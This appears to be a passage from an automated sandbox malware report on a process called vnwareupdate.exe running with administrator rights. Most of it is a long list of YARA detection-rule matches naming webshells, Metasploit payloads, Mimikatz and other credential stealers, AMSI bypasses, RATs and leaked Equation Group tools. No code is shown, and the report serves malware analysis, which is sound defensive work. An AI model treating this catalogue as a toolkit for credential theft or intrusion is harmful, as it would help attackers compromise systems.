File size:	10752 bytes
MD5 hash:	FA8AFFACE280644885152DE7CD3234EE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: vnwareupdate.exe PID: 6432 Parent PID: 2540

General

Start time:	13:46:31
Start date:	02/04/2021
Path:	C:\Users\user\Desktop\vnwareupdate.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\vnwareupdate.exe' '--multiprocessing-fork' '1236'
Imagebase:	0x400000
File size:	10752 bytes
MD5 hash:	FA8AFFACE280644885152DE7CD3234EE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Amplia_Security_Tool, Description: Amplia Security Tool, Source: 0000000A.00000003.323793714.00000000050C1000.00000004.00000001.sdmp, Author: unknown Rule: webshell_r57shell127_r57_iFX_r57_kartal_r57_antichat, Description: Web Shell - from files r57shell127.php, r57_iFX.php, r57_kartal.php, r57.php, antichat.php, Source: 0000000A.00000003.323793714.00000000050C1000.00000004.00000001.sdmp, Author: Florian Roth Rule: Safe0ver_Shell__Safe_Mod_Bypass_By_Evilc0der_php, Description: Semi-Auto-generated - file Safe0ver Shell -Safe Mod Bypass By Evilc0der.php.txt, Source: 0000000A.00000003.323793714.00000000050C1000.00000004.00000001.sdmp, Author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls Rule: Amplia_Security_Tool, Description: Amplia Security Tool, Source: 0000000A.00000003.321850832.00000000068D1000.00000004.00000001.sdmp, Author: unknown Rule: SQLMap, Description: This signature detects the SQLMap SQL injection tool, Source: 0000000A.00000003.321850832.00000000068D1000.00000004.00000001.sdmp, Author: Florian Roth Rule: PortRacer, Description: Auto-generated rule on file PortRacer.exe, Source: 0000000A.00000003.321850832.00000000068D1000.00000004.00000001.sdmp, Author: yarGen Yara Rule Generator by Florian Roth Rule: Amplia_Security_Tool, Description: Amplia Security Tool, Source: 0000000A.00000003.316101546.000000000684D000.00000004.00000001.sdmp, Author: unknown Rule: shankar_php_php, Description: Semi-Auto-generated - file shankar.php.php.txt, Source: 0000000A.00000003.316101546.000000000684D000.00000004.00000001.sdmp, Author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls Rule: Hacktool_Strings_p0wnedShell, Description: p0wnedShell Runspace Post Exploitation Toolkit - file p0wnedShell.cs, Source: 0000000A.00000003.312404128.0000000006667000.00000004.00000001.sdmp, Author: Florian Roth Rule: FVEY_ShadowBroker_Auct_Dez16_Strings, Description: String from the ShodowBroker Files Screenshots - Dec 2016, Source: 0000000A.00000003.323779225.0000000006626000.00000004.00000001.sdmp, Author: Florian Roth Rule: webshell_Liz0ziM_Private_Safe_Mode_Command_Execuriton_Bypass_Exploit, Description: Web Shell - file Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.php, Source: 0000000A.00000003.323779225.0000000006626000.00000004.00000001.sdmp, Author: Florian Roth Rule: WebShell_Liz0ziM_Private_Safe_Mode_Command_Execuriton_Bypass_Exploit, Description: PHP Webshells Github Archive - file Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.php, Source: 0000000A.00000003.323779225.0000000006626000.00000004.00000001.sdmp, Author: Florian Roth Rule: FVEY_ShadowBroker_Auct_Dez16_Strings, Description: String from the ShodowBroker Files Screenshots - Dec 2016, Source: 0000000A.00000003.324847009.0000000006648000.00000004.00000001.sdmp, Author: Florian Roth Rule: HKTL_Lazagne_Gen_18, Description: Detects Lazagne password extractor hacktool, Source: 0000000A.00000003.305047164.0000000003324000.00000004.00000001.sdmp, Author: Florian Roth Rule: HKTL_NoPowerShell, Description: Detects NoPowerShell hack tool, Source: 0000000A.00000003.305047164.0000000003324000.00000004.00000001.sdmp, Author: Florian Roth Rule: HKTL_LNX_Pnscan, Description: Detects Pnscan port scanner, Source: 0000000A.00000003.305047164.0000000003324000.00000004.00000001.sdmp, Author: Florian Roth Rule: SUSP_Script_Obfuscation_Char_Concat, Description: Detects strings found in sample from CN group repo leak in October 2018, Source: 0000000A.00000003.305047164.0000000003324000.00000004.00000001.sdmp, Author: Florian Roth Rule: SUSP_Netsh_PortProxy_Command, Description: Detects a suspicious command line with netsh and the portproxy command, Source: 0000000A.00000003.305047164.0000000003324000.00000004.00000001.sdmp, Author: Florian Roth Rule: MAL_HawkEye_Keylogger_Gen_Dec18, Description: Detects HawkEye Keylogger Reborn, Source: 0000000A.00000003.305047164.0000000003324000.00000004.00000001.sdmp, Author: Florian Roth Rule: VUL_JQuery_FileUpload_CVE_2018_9206, Description: Detects JQuery File Upload vulnerability CVE-2018-9206, Source: 0000000A.00000003.305047164.0000000003324000.00000004.00000001.sdmp, Author: Florian Roth Rule: APT_FIN7_Strings_Aug18_1, Description: Detects strings from FIN7 report in August 2018, Source: 0000000A.00000003.305047164.0000000003324000.00000004.00000001.sdmp, Author: Florian Roth Rule: APT_FIN7_MalDoc_Aug18_1, Description: Detects malicious Doc from FIN7 campaign, Source: 0000000A.00000003.305047164.0000000003324000.00000004.00000001.sdmp, Author: Florian Roth Rule: HKTL_PowerKatz_Feb19_1, Description: Detetcs a tool used in the Australian Parliament House network compromise, Source: 0000000A.00000003.305047164.0000000003324000.00000004.00000001.sdmp, Author: Florian Roth Rule: HKTL_Unknown_Feb19_1, Description: Detetcs a tool used in the Australian Parliament House network compromise, Source: 0000000A.00000003.305047164.0000000003324000.00000004.00000001.sdmp, Author: Florian Roth Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: 0000000A.00000003.305047164.0000000003324000.00000004.00000001.sdmp, Author: Florian Roth Rule: APT_APT34_PS_Malware_Apr19_1, Description: Detects APT34 PowerShell malware, Source: 0000000A.00000003.305047164.0000000003324000.00000004.00000001.sdmp, Author: Florian Roth Rule: APT_APT34_PS_Malware_Apr19_2, Description: Detects APT34 PowerShell malware, Source: 0000000A.00000003.305047164.0000000003324000.00000004.00000001.sdmp, Author: Florian Roth Rule: APT_APT34_PS_Malware_Apr19_3, Description: Detects APT34 PowerShell malware, Source: 0000000A.00000003.305047164.0000000003324000.00000004.00000001.sdmp, Author: Florian Roth Rule: PUA_CryptoMiner_Jan19_1, Description: Detects Crypto Miner strings, Source: 0000000A.00000003.305047164.0000000003324000.00000004.00000001.sdmp, Author: Florian Roth Rule: HKTL_Dsniff, Description: Detects Dsniff hack tool, Source: 0000000A.00000003.305047164.0000000003324000.00000004.00000001.sdmp, Author: Florian Roth Rule: APT_MAL_HOPLIGHT_NK_HiddenCobra_Apr19_1, Description: Detects HOPLIGHT malware used by HiddenCobra APT group, Source: 0000000A.00000003.305047164.0000000003324000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_CryptoMiner, Description: Yara detected Crypto Miner, Source: 0000000A.00000003.305047164.0000000003324000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Mirai_6, Description: Yara detected Mirai, Source: 0000000A.00000003.305047164.0000000003324000.00000004.00000001.sdmp, Author: Joe Security Rule: Amplia_Security_Tool, Description: Amplia Security Tool, Source: 0000000A.00000003.316213218.0000000006859000.00000004.00000001.sdmp, Author: unknown Rule: Hacktool_Strings_p0wnedShell, Description: p0wnedShell Runspace Post Exploitation Toolkit - file p0wnedShell.cs, Source: 0000000A.00000003.323605826.0000000006667000.00000004.00000001.sdmp, Author: Florian Roth Rule: webshell_Liz0ziM_Private_Safe_Mode_Command_Execuriton_Bypass_Exploit, Description: Web Shell - file Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.php, Source: 0000000A.00000003.324801435.0000000006627000.00000004.00000001.sdmp, Author: Florian Roth Rule: WebShell_Liz0ziM_Private_Safe_Mode_Command_Execuriton_Bypass_Exploit, Description: PHP Webshells Github Archive - file Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.php, Source: 0000000A.00000003.324801435.0000000006627000.00000004.00000001.sdmp, Author: Florian Roth Rule: Amplia_Security_Tool, Description: Amplia Security Tool, Source: 0000000A.00000003.318816470.000000000688B000.00000004.00000001.sdmp, Author: unknown Rule: Amplia_Security_Tool, Description: Amplia Security Tool, Source: 0000000A.00000003.308810849.00000000050AA000.00000004.00000001.sdmp, Author: unknown Rule: webshell_r57shell127_r57_iFX_r57_kartal_r57_antichat, Description: Web Shell - from files r57shell127.php, r57_iFX.php, r57_kartal.php, r57.php, antichat.php, Source: 0000000A.00000003.308810849.00000000050AA000.00000004.00000001.sdmp, Author: Florian Roth Rule: Safe0ver_Shell__Safe_Mod_Bypass_By_Evilc0der_php, Description: Semi-Auto-generated - file Safe0ver Shell -Safe Mod Bypass By Evilc0der.php.txt, Source: 0000000A.00000003.308810849.00000000050AA000.00000004.00000001.sdmp, Author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls Rule: Amplia_Security_Tool, Description: Amplia Security Tool, Source: 0000000A.00000003.310723677.00000000050AA000.00000004.00000001.sdmp, Author: unknown Rule: webshell_r57shell127_r57_iFX_r57_kartal_r57_antichat, Description: Web Shell - from files r57shell127.php, r57_iFX.php, r57_kartal.php, r57.php, antichat.php, Source: 0000000A.00000003.310723677.00000000050AA000.00000004.00000001.sdmp, Author: Florian Roth Rule: Safe0ver_Shell__Safe_Mod_Bypass_By_Evilc0der_php, Description: Semi-Auto-generated - file Safe0ver Shell -Safe Mod Bypass By Evilc0der.php.txt, Source: 0000000A.00000003.310723677.00000000050AA000.00000004.00000001.sdmp, Author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls Rule: FVEY_ShadowBroker_Auct_Dez16_Strings, Description: String from the ShodowBroker Files Screenshots - Dec 2016, Source: 0000000A.00000003.325411258.0000000006626000.00000004.00000001.sdmp, Author: Florian Roth Rule: Msfpayloads_msf, Description: Metasploit Payloads - file msf.sh, Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, Author: Florian Roth Rule: Msfpayloads_msf_2, Description: Metasploit Payloads - file msf.asp, Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, Author: Florian Roth Rule: Msfpayloads_msf_psh, Description: Metasploit Payloads - file msf-psh.vba, Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, Author: Florian Roth Rule: Msfpayloads_msf_exe, Description: Metasploit Payloads - file msf-exe.vba, Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, Author: Florian Roth Rule: Msfpayloads_msf_3, Description: Metasploit Payloads - file msf.psh, Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, Author: Florian Roth Rule: Msfpayloads_msf_4, Description: Metasploit Payloads - file msf.aspx, Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, Author: Florian Roth Rule: Msfpayloads_msf_exe_2, Description: Metasploit Payloads - file msf-exe.aspx, Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, Author: Florian Roth Rule: Msfpayloads_msf_6, Description: Metasploit Payloads - file msf.vbs, Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, Author: Florian Roth Rule: Msfpayloads_msf_7, Description: Metasploit Payloads - file msf.vba, Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, Author: Florian Roth Rule: Msfpayloads_msf_8, Description: Metasploit Payloads - file msf.ps1, Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, Author: Florian Roth Rule: Msfpayloads_msf_cmd, Description: Metasploit Payloads - file msf-cmd.ps1, Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, Author: Florian Roth Rule: Msfpayloads_msf_9, Description: Metasploit Payloads - file msf.war - contents, Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, Author: Florian Roth Rule: Msfpayloads_msf_11, Description: Metasploit Payloads - file msf.hta, Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, Author: Florian Roth Rule: Msfpayloads_msf_ref, Description: Metasploit Payloads - file msf-ref.ps1, Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, Author: Florian Roth Rule: HKTL_Meterpreter_inMemory, Description: Detects Meterpreter in-memory, Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, Author: netbiosX, Florian Roth Rule: CVE_2017_8759_SOAP_Excel, Description: Detects malicious files related to CVE-2017-8759, Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, Author: Florian Roth Rule: PowerShell_ISESteroids_Obfuscation, Description: Detects PowerShell ISESteroids obfuscation, Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, Author: Florian Roth Rule: Reflective_DLL_Loader_Aug17_1, Description: Detects Reflective DLL Loader, Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, Author: Florian Roth Rule: Reflective_DLL_Loader_Aug17_2, Description: Detects Reflective DLL Loader - suspicious - Possible FP could be program crack, Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, Author: Florian Roth Rule: Reflective_DLL_Loader_Aug17_3, Description: Detects Reflective DLL Loader, Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, Author: Florian Roth Rule: VBScript_Favicon_File, Description: VBScript cloaked as Favicon file used in Leviathan incident, Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, Author: Florian Roth Rule: Backdoor_Redosdru_Jun17, Description: Detects malware Redosdru - file systemHome.exe, Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, Author: Florian Roth Rule: Backdoor_Nitol_Jun17, Description: Detects malware backdoor Nitol - file wyawou.exe - Attention: this rule also matches on Upatre Downloader, Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, Author: Florian Roth Rule: WScript_Shell_PowerShell_Combo, Description: Detects malware from Middle Eastern campaign reported by Talos, Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, Author: Florian Roth Rule: HTA_with_WScript_Shell, Description: Detects WScript Shell in HTA, Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, Author: Florian Roth Rule: HTA_Embedded, Description: Detects an embedded HTA file, Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, Author: Florian Roth Rule: StoneDrill, Description: Detects malware from StoneDrill threat report, Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, Author: Florian Roth Rule: StoneDrill_VBS_1, Description: Detects malware from StoneDrill threat report, Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, Author: Florian Roth Rule: ZxShell_Jul17, Description: Detects a ZxShell - CN threat group, Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, Author: Florian Roth Rule: EternalRocks_taskhost, Description: Detects EternalRocks Malware - file taskhost.exe, Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, Author: Florian Roth Rule: BeyondExec_RemoteAccess_Tool, Description: Detects BeyondExec Remote Access Tool - file rexesvr.exe, Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, Author: Florian Roth Rule: Disclosed_0day_POCs_injector, Description: Detects POC code from disclosed 0day hacktool set, Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, Author: Florian Roth Rule: APT_PupyRAT_PY, Description: Detects Pupy RAT, Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, Author: Florian Roth Rule: OilRig_Strings_Oct17, Description: Detects strings from OilRig malware and malicious scripts, Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, Author: Florian Roth Rule: Suspicious_Script_Running_from_HTTP, Description: Detects a suspicious , Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, Author: Florian Roth Rule: VBS_dropper_script_Dec17_1, Description: Detects a supicious VBS script that drops an executable, Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, Author: Florian Roth Rule: Industroyer_Malware_1, Description: Detects Industroyer related malware, Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, Author: Florian Roth Rule: Industroyer_Portscan_3_Output, Description: Detects Industroyer related custom port scaner output file, Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, Author: Florian Roth Rule: Industroyer_Malware_4, Description: Detects Industroyer related malware, Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, Author: Florian Roth Rule: Industroyer_Malware_5, Description: Detects Industroyer related malware, Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, Author: Florian Roth Rule: redSails_PY, Description: Detects Red Sails Hacktool - Python, Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, Author: Florian Roth Rule: Rehashed_RAT_2, Description: Detects malware from Rehashed RAT incident, Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, Author: Florian Roth Rule: Pupy_Backdoor, Description: Detects Pupy backdoor, Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, Author: Florian Roth Rule: Microcin_Sample_5, Description: Malware sample mentioned in Microcin technical report by Kaspersky, Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, Author: Florian Roth Rule: clearlog, Description: Detects Fireball malware - file clearlog.dll, Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, Author: Florian Roth Rule: PS_AMSI_Bypass, Description: Detects PowerShell AMSI Bypass, Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, Author: Florian Roth Rule: JS_Suspicious_Obfuscation_Dropbox, Description: Detects PowerShell AMSI Bypass, Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, Author: Florian Roth Rule: JS_Suspicious_MSHTA_Bypass, Description: Detects MSHTA Bypass, Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, Author: Florian Roth Rule: JavaScript_Run_Suspicious, Description: Detects a suspicious Javascript Run command, Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, Author: Florian Roth Rule: FVEY_ShadowBroker_Auct_Dez16_Strings, Description: String from the ShodowBroker Files Screenshots - Dec 2016, Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, Author: Florian Roth Rule: Ysoserial_Payload_Spring1, Description: Ysoserial Payloads - file Spring1.bin, Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, Author: Florian Roth Rule: Ysoserial_Payload, Description: Ysoserial Payloads, Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, Author: Florian Roth Rule: Ysoserial_Payload_3, Description: Ysoserial Payloads - from files JavassistWeld1.bin, JBossInterceptors.bin, Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, Author: Florian Roth Rule: CACTUSTORCH, Description: Detects CactusTorch Hacktool, Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, Author: Florian Roth Rule: Quasar_RAT_1, Description: Detects Quasar RAT, Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, Author: Florian Roth Rule: Quasar_RAT_2, Description: Detects Quasar RAT, Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, Author: Florian Roth Rule: OpCloudHopper_Malware_2, Description: Detects malware from Operation Cloud Hopper, Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, Author: Florian Roth Rule: OpCloudHopper_Malware_3, Description: Detects malware from Operation Cloud Hopper, Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, Author: Florian Roth Rule: OpCloudHopper_Malware_5, Description: Detects malware from Operation Cloud Hopper, Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, Author: Florian Roth Rule: OpCloudHopper_WmiDLL_inMemory, Description: Malware related to Operation Cloud Hopper - Page 25, Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, Author: Florian Roth Rule: VBS_WMIExec_Tool_Apr17_1, Description: Tools related to Operation Cloud Hopper, Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, Author: Florian Roth Rule: RevengeRAT_Sep17, Description: Detects RevengeRAT malware, Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, Author: Florian Roth Rule: Mimipenguin_SH, Description: Detects Mimipenguin Password Extractor - Linux, Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, Author: Florian Roth Rule: POSHSPY_Malware, Description: Detects, Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, Author: Florian Roth Rule: Invoke_Mimikatz, Description: Detects Invoke-Mimikatz String, Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, Author: Florian Roth Rule: FIN7_Backdoor_Aug17, Description: Detects Word Dropper from Proofpoint FIN7 Report, Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, Author: Florian Roth Rule: PUA_CryptoMiner_Jan19_1, Description: Detects Crypto Miner strings, Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, Author: Florian Roth Rule: Invoke_SMBExec, Description: Detects Invoke-WmiExec or Invoke-SmbExec, Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, Author: Florian Roth Rule: Invoke_WMIExec_Gen_1, Description: Detects Invoke-WmiExec or Invoke-SmbExec, Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, Author: Florian Roth Rule: Invoke_SMBExec_Invoke_WMIExec_1, Description: Auto-generated rule - from files Invoke-SMBExec.ps1, Invoke-WMIExec.ps1, Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, Author: Florian Roth Rule: Invoke_WMIExec_Gen, Description: Auto-generated rule - from files Invoke-SMBClient.ps1, Invoke-SMBExec.ps1, Invoke-WMIExec.ps1, Invoke-WMIExec.ps1, Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, Author: Florian Roth Rule: WMImplant, Description: Auto-generated rule - file WMImplant.ps1, Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, Author: Florian Roth Rule: FVEY_ShadowBrokers_Jan17_Screen_Strings, Description: Detects strings derived from the ShadowBroker\'s leak of Windows tools/exploits, Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, Author: Florian Roth Rule: Invoke_OSiRis, Description: Osiris Device Guard Bypass - file Invoke-OSiRis.ps1, Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, Author: Florian Roth Rule: MAL_KHRAT_script, Description: Rule derived from KHRAT script but can match on other malicious scripts as well, Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, Author: Florian Roth Rule: WiltedTulip_powershell, Description: Detects powershell script used in Operation Wilted Tulip, Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, Author: Florian Roth Rule: WiltedTulip_Windows_UM_Task, Description: Detects a Windows scheduled task as used in Operation Wilted Tulip, Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, Author: Florian Roth Rule: WiltedTulip_WindowsTask, Description: Detects hack tool used in Operation Wilted Tulip - Windows Tasks, Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, Author: Florian Roth Rule: WiltedTulip_ReflectiveLoader, Description: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, Author: Florian Roth Rule: Impacket_Tools_Generic_1, Description: Compiled Impacket Tools, Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, Author: Florian Roth Rule: EquationGroup_Auditcleaner, Description: Equation Group hack tool leaked by ShadowBrokers- file Auditcleaner, Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, Author: Florian Roth Rule: EquationGroup_elgingamble, Description: Equation Group hack tool leaked by ShadowBrokers- file elgingamble, Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, Author: Florian Roth Rule: EquationGroup_cmsd, Description: Equation Group hack tool leaked by ShadowBrokers- file cmsd, Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, Author: Florian Roth Rule: EquationGroup_ebbshave, Description: Equation Group hack tool leaked by ShadowBrokers- file ebbshave.v5, Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, Author: Florian Roth Rule: EquationGroup_eggbasket, Description: Equation Group hack tool leaked by ShadowBrokers- file eggbasket, Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, Author: Florian Roth Rule: EquationGroup_sambal, Description: Equation Group hack tool leaked by ShadowBrokers- file sambal, Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, Author: Florian Roth Rule: EquationGroup_envisioncollision, Description: Equation Group hack tool leaked by ShadowBrokers- file envisioncollision, Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, Author: Florian Roth Rule: EquationGroup_cmsex, Description: Equation Group hack tool leaked by ShadowBrokers- file cmsex, Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, Author: Florian Roth Rule: EquationGroup_DUL, Description: Equation Group hack tool leaked by ShadowBrokers- file DUL, Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, Author: Florian Roth Rule: EquationGroup_slugger2, Description: Equation Group hack tool leaked by ShadowBrokers- file slugger2, Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, Author: Florian Roth Rule: EquationGroup_jackpop, Description: Equation Group hack tool leaked by ShadowBrokers- file jackpop, Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, Author: Florian Roth Rule: EquationGroup_epoxyresin_v1_0_0, Description: Equation Group hack tool leaked by ShadowBrokers- file epoxyresin.v1.0.0.1, Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, Author: Florian Roth Rule: EquationGroup_estesfox, Description: Equation Group hack tool leaked by ShadowBrokers- file estesfox, Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, Author: Florian Roth Rule: EquationGroup_elatedmonkey_1_0_1_1, Description: Equation Group hack tool leaked by ShadowBrokers- file elatedmonkey.1.0.1.1.sh, Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, Author: Florian Roth Rule: EquationGroup__ftshell_ftshell_v3_10_3_0, Description: Equation Group hack tool leaked by ShadowBrokers- from files ftshell, ftshell.v3.10.3.7, Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, Author: Florian Roth Rule: EquationGroup__scanner_scanner_v2_1_2, Description: Equation Group hack tool leaked by ShadowBrokers- from files scanner, scanner.v2.1.2, Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, Author: Florian Roth Rule: EquationGroup__ghost_sparc_ghost_x86_3, Description: Equation Group hack tool leaked by ShadowBrokers- from files ghost_sparc, ghost_x86, Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, Author: Florian Roth Rule: EquationGroup__jparsescan_parsescan_5, Description: Equation Group hack tool leaked by ShadowBrokers- from files jparsescan, parsescan, Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, Author: Florian Roth Rule: EquationGroup__funnelout_v4_1_0_1, Description: Equation Group hack tool leaked by ShadowBrokers- from files funnelout.v4.1.0.1.pl, Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, Author: Florian Roth Rule: EquationGroup__magicjack_v1_1_0_0_client, Description: Equation Group hack tool leaked by ShadowBrokers- from files magicjack_v1.1.0.0_client-1.1.0.0.py, Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, Author: Florian Roth Rule: EquationGroup__ftshell, Description: Equation Group hack tool leaked by ShadowBrokers- from files ftshell, ftshell.v3.10.3.7, Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, Author: Florian Roth Rule: EquationGroup_noclient_3_3_2, Description: Equation Group hack tool set, Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, Author: Florian Roth Rule: EquationGroup_Toolset_Apr17_Eternalromance, Description: Detects EquationGroup Tool - April Leak, Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, Author: Florian Roth Rule: EquationGroup_Toolset_Apr17_Gen2, Description: Detects EquationGroup Tool - April Leak, Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, Author: Florian Roth Rule: EquationGroup_Toolset_Apr17_ntevt, Description: Detects EquationGroup Tool - April Leak, Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, Author: Florian Roth Rule: EquationGroup_Toolset_Apr17_msgkd_msslu64_msgki_mssld, Description: Detects EquationGroup Tool - April Leak, Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, Author: Florian Roth Rule: EquationGroup_Toolset_Apr17__DoubleFeatureReader_DoubleFeatureReader_0, Description: Detects EquationGroup Tool - April Leak, Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, Author: Florian Roth Rule: EquationGroup_Toolset_Apr17__EAFU_ecwi_ESKE_EVFR_RPC2_4, Description: Detects EquationGroup Tool - April Leak, Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, Author: Florian Roth Rule: EquationGroup_scanner_output, Description: Detects output generated by EQGRP scanner.exe, Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 